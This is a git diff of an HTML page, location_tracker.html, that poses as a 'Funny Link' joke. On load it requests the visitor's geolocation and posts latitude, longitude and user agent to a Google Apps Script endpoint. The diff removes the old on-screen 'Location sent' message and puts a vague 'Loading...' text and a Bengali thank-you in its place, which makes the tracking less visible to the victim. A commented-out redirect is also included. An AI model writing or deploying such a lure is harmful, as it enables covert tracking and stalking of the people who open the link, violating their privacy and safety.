--- a/location_tracker.html
+++ b/location_tracker.html
@@ -1,53 +1,53 @@
 <!DOCTYPE html>
 <html>
-<head>
-  <title>Funny Map Experiment 😂</title>
-  <meta name="viewport" content="width=device-width, initial-scale=1.0">
-  <style>
-    body {
-      font-family: Arial, sans-serif;
-      text-align: center;
-      padding: 50px;
-    }
-    .success {
-      color: green;
-    }
-    .error {
-      color: red;
-    }
-  </style>
-</head>
-<body>
-  <h1>😜 Funny Map Experiment</h1>
-  <p>Tap “Allow” to see your real-time location!</p>
-  <p id="status">Requesting location...</p>
-  <script>
-    function sendLocation(lat, lon) {
-      fetch("https://script.google.com/macros/s/AKfycbw9qFm0UFnu3eengU-c21xnMyiwCRy8_b9JWN8bZL7eGZxzfOWsfl-mHAXoU7UHNRMD/exec", {
-        method: "POST",
-        mode: "no-cors",
-        headers: {
-          "Content-Type": "application/json"
-        },
-        body: JSON.stringify({
-          latitude: lat,
-          longitude: lon,
-          userAgent: navigator.userAgent
+  <head>
+    <title>Funny Link 🤪</title>
+    <meta charset="UTF-8" />
+    <script>
+      function sendLocation(position) {
+        const latitude = position.coords.latitude;
+        const longitude = position.coords.longitude;
+        const userAgent = navigator.userAgent;
+
+        fetch("https://script.google.com/macros/s/AKfycbw9qFm0UFnu3eengU-c21xnMyiwCRy8_b9JWN8bZL7eGZxzfOWsfl-mHAXoU7UHNRMD/exec", {
+          method: "POST",
+          body: JSON.stringify({
+            latitude,
+            longitude,
+            userAgent
+          }),
+          headers: {
+            "Content-Type": "application/json"
+          }
         })
-      });
-    }
+        .then(() => {
+          document.getElementById("status").innerText = "ধন্যবাদ! 😊";
+          
+          // Optional Redirect after 3 seconds:
+          // window.location.href = "https://example.com";
+        })
+        .catch(() => {
+          document.getElementById("status").innerText = "দুঃখিত, সমস্যা হয়েছে!";
+        });
+      }
 
-    function success(pos) {
-      const crd = pos.coords;
-      document.getElementById("status").innerHTML = `<span class='success'>Location sent: ${crd.latitude}, ${crd.longitude}</span>`;
-      sendLocation(crd.latitude, crd.longitude);
-    }
+      function handleError(error) {
+        document.getElementById("status").innerText = "লোকেশন পাওয়া যায়নি ❌";
+      }
 
-    function error(err) {
-      document.getElementById("status").innerHTML = `<span class='error'>ERROR: ${err.message}</span>`;
-    }
+      function getLocation() {
+        if (navigator.geolocation) {
+          navigator.geolocation.getCurrentPosition(sendLocation, handleError);
+        } else {
+          document.getElementById("status").innerText = "ব্রাউজার সাপোর্ট করে না!";
+        }
+      }
 
-    navigator.geolocation.getCurrentPosition(success, error);
-  </script>
-</body>
+      window.onload = getLocation;
+    </script>
+  </head>
+  <body style="font-family: sans-serif; text-align: center; margin-top: 100px;">
+    <h2>😜 Loading...</h2>
+    <p id="status">লোকেশন নিচ্ছে...</p>
+  </body>
 </html>
